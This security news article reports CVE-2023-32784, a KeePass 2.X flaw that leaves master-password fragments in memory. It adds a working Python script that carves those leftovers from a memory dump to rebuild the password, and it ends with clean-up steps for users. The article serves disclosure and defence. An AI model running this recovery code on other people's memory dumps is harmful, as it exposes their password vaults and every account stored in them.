A proof-of-concept (PoC) has been made available for a security flaw in the KeePass password manager that could be used to recover a victim’s master password in cleartext in certain situations.
The KeePass 2.X branch for Windows, Linux, and macOS is vulnerable to CVE-2023-32784.
CVE-2023-32784 exists in “SecureTextBoxEx,” the custom text box KeePass uses for entering the master password and, when editing entries, other passwords.
“Apart from the first password character, it is mostly able to recover the password in plaintext,” security researcher “vdohney,” who discovered the flaw and devised a PoC, said. “No code execution on the target system is required, just a memory dump.”
“For example, when ‘Password’ is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The POC application searches the dump for these patterns and offers a likely password character for each position in the password.” (That is, for every position except the first – a small hiccup for potential attackers.)
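The pattern search the researcher describes can be reproduced in a few lines. The following is an added illustration, not the PoC published on GitHub: it assumes the leftover strings are stored as .NET UTF-16LE strings (so a bullet is the byte pair `22 20`), builds a constructed stand-in for a memory dump containing those leftovers among filler, and carves candidate characters per position. A real dump also needs handling of unaligned matches and of noise from typo corrections, which the PoC does and this sketch does not.

```python
import re
from collections import Counter, defaultdict

# SecureTextBoxEx masks each typed character with U+2022 (•). In a .NET process
# the leftover strings are UTF-16LE, so one bullet is the byte pair 22 20.
BULLET = "\u2022"
BULLET_LE = BULLET.encode("utf-16-le")  # b"\x22\x20"
# One or more bullets followed by exactly one UTF-16 code unit (the typed char).
LEFTOVER_RE = re.compile(rb"((?:\x22\x20)+)(.{2})", re.DOTALL)


def build_constructed_dump(password: str) -> bytes:
    """Build a CONSTRUCTED stand-in for a process memory dump (test data only).

    For every keystroke after the first, a leftover string of N bullets followed
    by the N-th typed character is placed among filler and unrelated data.
    """
    chunks = [b"\x00" * 16, "unrelated .NET string".encode("utf-16-le")]
    for n in range(1, len(password)):
        chunks.append(b"\x00" * 8)  # filler between heap objects
        chunks.append((BULLET * n + password[n]).encode("utf-16-le"))
    chunks.append(b"\x00" * 16)
    return b"".join(chunks)


def collect_candidates(dump: bytes) -> dict:
    """Map password position -> Counter of characters seen at that position."""
    candidates = defaultdict(Counter)
    for match in LEFTOVER_RE.finditer(dump):
        position = len(match.group(1)) // len(BULLET_LE)  # bullets typed so far
        try:
            char = match.group(2).decode("utf-16-le")
        except UnicodeDecodeError:
            continue  # not a complete code unit
        if char in ("\x00", BULLET) or not char.isprintable():
            continue  # string terminator or junk, not a typed character
        candidates[position][char] += 1
    return candidates


def recover_password(dump: bytes) -> str:
    """Rebuild the most likely password. Position 0 never appears in the
    leftovers, so it is reported as '?', the gap the researcher notes."""
    candidates = collect_candidates(dump)
    if not candidates:
        return ""
    out = ["?"] * (max(candidates) + 1)
    for pos, counter in candidates.items():
        out[pos] = counter.most_common(1)[0][0]
    return "".join(out)


if __name__ == "__main__":
    print(recover_password(build_constructed_dump("Password")))  # → ?assword
```

Because every keystroke leaves its own string, a corrected typo shows up as two candidates for the same position; `collect_candidates` keeps all of them so an analyst can rank them rather than silently picking one.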
KeePass 2.X Master Password Dumper, the proof-of-concept exploit for CVE-2023-32784, is available on GitHub. The tool works on a memory dump, not on a live remote system: an attacker must first obtain a KeePass process dump, the pagefile/swapfile, the hibernation file, or a full RAM capture of the machine. Updating KeePass does not scrub leftover strings from dumps that already exist, so if you suspect memory of your system may have been captured, the recommended clean-up is:
- Change the master password
- Delete the hibernation file
- Delete the pagefile/swapfile
- Overwrite deleted data on the HDD to prevent carving
- Restart your computer
The vulnerability affects the KeePass 2.X branch for Windows, and possibly the Linux and macOS builds as well; KeePass 1.X and independent implementations such as KeePassXC are not affected. It has been fixed in the test versions of KeePass 2.54; the official release is expected by July 2023.